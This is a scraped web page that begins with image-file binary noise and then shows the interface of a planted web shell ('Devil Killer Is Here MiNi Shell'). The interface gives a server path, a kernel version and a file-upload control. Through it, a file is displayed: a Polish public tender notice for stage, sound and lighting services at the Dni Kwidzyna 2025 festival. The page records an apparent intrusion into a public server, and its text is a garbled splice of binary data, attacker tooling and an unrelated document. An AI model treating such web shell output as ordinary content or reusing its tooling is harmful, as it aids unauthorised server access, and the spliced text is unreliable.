JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250425/0020718901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa dostawy i montażu scen, usługa nagłośnienia scenicznego wraz z oświetleniem scenicznym oraz sprzętem multimedialnym podczas imprezy plenerowej Dni Kwidzyna 13-15 czerwca 2025 w Kwidzynie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KWIDZYŃSKIE CENTRUM KULTURY W KWIDZYNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170272815</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 11 Listopada 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kwidzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">552793528</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kck@kck-kwidzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kckkwidzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa dostawy i montażu scen, usługa nagłośnienia scenicznego wraz z oświetleniem scenicznym oraz sprzętem multimedialnym podczas imprezy plenerowej Dni Kwidzyna 13-15 czerwca 2025 w Kwidzynie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-af81f2f4-276a-4561-b152-22d851ce07c6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00207189</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kck_kwidzyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/kck_kwidzyn</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z § 11 ust. 2<br/>ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych<br/>danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>9. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>10. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>11. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">17.1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuję, że Administratorem Danych Osobowych, czyli podmiotem decydującym o tym, jak będą przetwarzane Państwa dane osobowe jest Kwidzyńskie Centrum Kultury w Kwidzynie (dalej KCK) z siedzibą przy ulicy 11 listopada 13 82-500 Kwidzyn, w imieniu której działa Dyrektor KCK.<br/>1)	Cele przetwarzania Państwa danych osobowych:<br/>a)	realizacja zadań własnych wynikających z regulaminu KCK i ustawy o działalności instytucji kultury (art. 6 ust. 1 lit. c RODO);<br/>b)	prowadzenie analiz i statystyk na potrzeby prowadzonej działalności (art. 6 ust. 1 lit. a-c RODO);<br/>c)	sprzedaż produktów i usług oferowanych przez Administratora (art. 6 ust. 1 lit. b RODO) ;<br/>d)	prowadzenie działań marketingowych (art. 6 ust. 1 lit. a RODO);<br/>e)	udzielanie odpowiedzi na pisma i wnioski (art. 6 ust. 1 lit. a-c RODO);<br/>f)	prowadzenie działań związanych z zapewnieniem bezpieczeństwa (art. 6 ust. 1 lit. c i e RODO);<br/>g)	wypełnianie obowiązku prawnego ciążącego na Administratorze (art. 6 ust. 1 lit. c RODO);<br/>h)	zawarcie i realizacja umowy (świadczenia usług) (art. 6 ust. 1 lit. b RODO).<br/>2)	Podstawy prawne przetwarzania Państwa danych:<br/>a)	art. 6 ust. 1 lit. a RODO tj. zgoda osoby, której dane dotyczą;<br/>b)	art. 6 ust. 1 lit. b RODO tj. przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy;<br/>c)	art. 6 ust. 1 lit. c RODO tj. wypełnienie obowiązku prawnego ciążącego na Administratorze;<br/>d)	art. 6 ust. 1 lit. e RODO, tj. przetwarzanie jest niezbędne do wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej powierzonej administratorowi.<br/>e)	RODO - rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych).<br/>3)	Dane osobowe będą przechowywane przez okres który jest uzależniony od celu, w jakim dane są przetwarzane. Okres, przez który Państwa dane osobowe będą przechowywane, jest obliczany w oparciu o następujące kryteria: przepisy prawa, które mogą obligować Administratora do przetwarzania danych przez określny czas (np. ustawa o rachunkowości, ustawa o działalności instytucji kultury, ustawa o narodowym zasobie archiwalnym i archiwach, ustawa o zamówieniach publicznych); w związku z realizacją zwartej umowy, do czasu jej zakończenia, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy prawa lub dla zabezpieczenia ewentualnych roszczeń, z uwzględnieniem właściwych terminów przedawnienia roszczeń;<br/>4)	Dane przetwarzane na podstawie zgody będą przechowywane do momentu wycofania zgody lub do momentu ustania celu dla którego zostały zebrane.<br/>5)	Odbiorcy Państwa danych:<br/>Podmioty przetwarzające dane w naszym imieniu, uczestniczące w wykonywaniu czynności na naszą rzecz tj.: podmioty obsługujące i utrzymujące naszą sieć informatyczną, dostawcy świadczący usługę hostingu, podmioty świadczące nam usługi doradcze, audytowe, pomoc prawną, obsługę pielęgniarską, rachunkową oraz inne podmioty uprawnione na podstawie przepisów prawa.<br/>6)	Przysługuje Państwu prawo do dostępu do swoich danych osobowych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania, a także prawo do przenoszenia danych, zgodnie z przepisami RODO. Ponadto przysługuje Pańswtu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-193 Warszawa, tel. (22) 531 03 00,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OZ.261.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 150000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa dostawy i montażu scen, usługa nagłośnienia scenicznego wraz z oświetleniem scenicznym podczas Dni Kwidzyna w terminie <br/>13-15 czerwca 2025 roku w Kwidzynie.<br/>WAŻNE! <br/>Wydarzenie pn. Dni Kwidzyna jest imprezą masową i każdego dnia odbywa <br/>się w innym miejscu w Kwidzynie. <br/>⮚	13 czerwca 2025 – Plac przy ul. 11 Listopada - impreza masowa do 3 tys. osób<br/>⮚	14 czerwca 2025 – Stadion Miejski przy ul. Sportowej 6 – impreza masowa <br/>do 6 tys. osób<br/>⮚	15 czerwca 2025 – ul. Targowa – impreza masowa do 3 tys. osób<br/><br/>DATA/MIEJSCE/<br/>GODZINY	ZAPOTRZEBOWANIE<br/>13 CZERWCA /PIĄTEK/ <br/>Plac przy <br/>ul. 11 Listopada, Kwidzyn	SCENA<br/>Dostarczenie oraz montaż na miejsce koncertu sceny typu modułowego odpornej na warunki atmosferyczne, wykonanych z aluminium, stali ocynkowanej ogniowo. Podbudowa sceny z możliwością poziomowania na nierównym terenie: preferowany wymiar minimum 12m x 9m. Scena musi posiadać podłogę drewnianą ze sklejki z powierzchnią antypoślizgową. Scena musi być wyposażona w risery na kołach wg Riderów artystów/zespołów. Scena musi być wyposażona w podesty wg Riderów artystów/zespołów. Scena musi posiadać aktualne atesty bezpieczeństwa. Zapewnienie po obu stronach scen obarierowanych i oświetlonych schodów pełnych do estrady z poziomu gruntu o szerokości 2m. <br/><br/>ZADASZENIE<br/>Zapewnienie zadaszenia sceny o wymiarach 13m x 10m - dwuspadowy, w kolorze czarnym o obciążalności zapewniającej bezpieczne zamontowanie wszystkich urządzeń zgodnie z riderami. <br/><br/>NAGŁOŚNIENIE<br/>System trójdrożny z technologią niwelacji sygnału z tyłu obudowy na głośnikach niskotonowych min 10&#34; w. ilości 12 szt. na stronę + subbasy 12 szt. Matryca audio obsługująca protokoły analog, aes, dante oraz madi. Reszta techniki zgodna z riderami Artystów/Zespołów<br/>Stanowisko FOH oraz MON typu Layher<br/>OŚWIETLENIE<br/>Zgodnie z riderami Artystów/Zespołów<br/><br/>SPRZĘT DJ’SKI<br/>Dostarczenie profesjonalnego sprzętu Dj’skiego zgodnie z Riderami Artystów<br/>14 CZERWCA /SOBOTA/ <br/>Stadion Miejski, <br/>ul. Sportowa 6, Kwidzyn	SCENA<br/>Dostarczenie i montaż na miejsce koncertu sceny typu modułowego odpornej na warunki atmosferyczne, wykonanych z aluminium, stali ocynkowanej ogniowo. Podbudowa sceny z możliwością poziomowania na nierównym terenie: minimalny wymiar 12m x 11m + wybieg (zgodnie z riderami Artysty/Zespołu). Scena musi posiadać podłogę drewnianą ze sklejki z powierzchnią antypoślizgową. Scena musi być wyposażona w risery na kołach wg Riderów artystów/zespołów. Scena musi być wyposażona w podesty wg Riderów artystów/zespołów. Scena musi posiadać aktualne atesty bezpieczeństwa. Zapewnienie po obu stronach scen obarierowanych i oświetlonych schodów pełnych do estrady z poziomu gruntu o szerokości 2,5m. <br/>Stanowisko techniczne z boku sceny (backstage) o wymiarze 6m x 5m z dachem 7m x 5m. Stanowisko FOH oraz MON (typu Layher)<br/>Wieże do systemu nagłośnieniowego (typu Layher) 2,57m x 2,57m o wysokości 10m.<br/><br/>ZADASZENIE<br/>Zapewnienia zadaszenia sceny o wymiarach minimum 13m x 12m, dwuspadowy w kolorze czarnym o obciążalności zapewniającej bezpieczne zamontowanie wszystkich urządzeń zgodnie z riderami. <br/><br/>MULTIMEDIA<br/>Dostarczenie, montaż, obsługę i realizację ekranu LED oraz realizacja wizualizacji dostarczonej przez Artystów na ekranie. Minimalne wymagania LED: 7m x 3,5m pixel 3.9 - montaż ekranu na scenie zgodnie z Riderami. <br/><br/>NAGŁOŚNIENIE<br/>System trójdrożny wielkoformatowy z głośnikami niskotonowymi min 12&#34; w ilości 14 szt. na stronę + subbasy 16 szt. Matryca audio obsługująca protokoły analog, aes, dante oraz madi. Reszta techniki zgodna z riderami Artsytów/Zespołów.<br/><br/>OŚWIETLENIE<br/>Zgodnie z riderami Artystów/Zespołów.<br/>15 CZERWCA /NIEDZIELA/ <br/>Stare Miasto, <br/>ul. Targowa, <br/>Kwidzyn	SCENA<br/>Dostarczenia i montaż na miejsce koncertu sceny typu modułowego odpornej na warunki atmosferyczne, wykonanych z aluminium, stali ocynkowanej ogniowo. Podbudowa sceny z możliwością poziomowania na nierównym terenie: preferowany wymiar 12m x 9m. Scena musi posiadać podłogę drewnianą ze sklejki z powierzchnią antypoślizgową. Scena musi być wyposażona w risery na kołach wg Riderów artystów/zespołów. Scena musi być wyposażona w podesty wg Riderów artystów/zespołów. Scena musi posiadać aktualne atesty bezpieczeństwa. Zapewnienie po obu stronach scen obarierowanych i oświetlonych schodów pełnych do estrady z poziomu gruntu o szerokości 2,5m. <br/>Stanowisko FOH oraz MON (typu Layher).<br/><br/>ZADASZENIE<br/>Zapewnienia zadaszenia sceny o wymiarach minimum 13m x 10m, dwuspadowy w kolorze czarnym o obciążalności zapewniającej bezpieczne zamontowanie wszystkich urządzeń zgodnie z riderami. <br/><br/>NAGŁOŚNIENIE<br/>System trójdrożny wielkoformatowy z głośnikami niskotonowymi min 12&#34; w ilości 12 szt. na stronę + subbasy 12 szt. Matryca audio obsługująca protokoły analog, aes, dante oraz madi. Reszta techniki zgodna z riderami Artystów/Zespołów.<br/><br/>OŚWIETLENIE<br/>Zgodnie z riderami Artystów/Zespołów.<br/><br/><br/>Sceny i dachy powinny być uziemione oraz zamontowane z uwzględnieniem zasad bezpieczeństwa (odciągi/balasty etc.). Wszystkie konstrukcje muszą zapewniać bezpieczne użytkowanie zarówno w zakresie wymaganej wytrzymałości konstrukcji, jak również pod względem zachowania zasad bhp <br/>i ppoż. oraz innych przepisów szczegółowych w zakresie wykonywanych czynności.<br/><br/>Wykonawca zobowiązuje się do zabezpieczenia terenu przed mechanicznymi uszkodzeniami na czas realizacji zamówienia. W przypadku prowadzenia okablowania przez ciągi komunikacyjne lub miejsca widoczne musi być ono zabezpieczone najazdami kablowymi.<br/><br/>Utrzymania urządzeń scenicznych w pełnej funkcjonalności w toku całej imprezy.<br/><br/>Dostarczenia na miejsce imprezy sprzętu nagłośnieniowego zgodnego z riderami technicznymi artystów/zespołów, a ponadto pełnej instalacji wszystkich urządzeń nagłośnieniowych i obsługi tych urządzeń podczas koncertów przez profesjonalną ekipę nagłośnieniową. Wszelkie zmiany / odstępstwa od Riderów technicznych muszą być ustalane z realizatorami dźwięku artystów/zespołów nie później niż na 14 dni przed datą koncertu. Protokół uzgodnień w/w zmian podpisany przez Menagera lub Artystę należy dostarczyć do 10 dni przed datą koncertu.<br/><br/>Dostarczenie na miejsce imprezy sprzętu oświetleniowego zgodnego z riderami technicznymi artystów/zespołów, a ponadto pełnej instalacji wszystkich urządzeń oświetleniowych i obsługi tych urządzeń podczas koncertów przez profesjonalną ekipę oświetleniową. Wszelkie zmiany/odstępstwa od Riderów technicznych muszą być ustalane z realizatorami oświetlenia artystów/zespołów nie później niż na 14 dni przed datą koncertu. Protokół uzgodnień w/w zmian podpisany przez Menagera lub Artystę należy dostarczyć do 10 dni przed datą koncertu.<br/><br/>W przypadku awarii sprzętu w trakcie trwania imprezy Zamawiający wymaga, aby Wykonawca zapewnił sprzęt zastępczy o parametrach zgodnych z riderami Artystów.<br/><br/>Zapewnienia wszelkich urządzeń technicznych niezbędnych do montażu i demontażu konstrukcji oraz oświetlenia, nagłośnienia i multimediów.<br/>Zdemontowania całej infrastruktury scenicznej wraz z zapleczem po zakończeniu imprezy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79952100-3 - Usługi w zakresie organizacji imprez kulturalnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-12 do 2025-06-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.	nie podlegają wykluczeniu,<br/>2.	spełniają warunki udziału w postępowaniu, o ile zostały one określone.<br/>1.2.	Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w 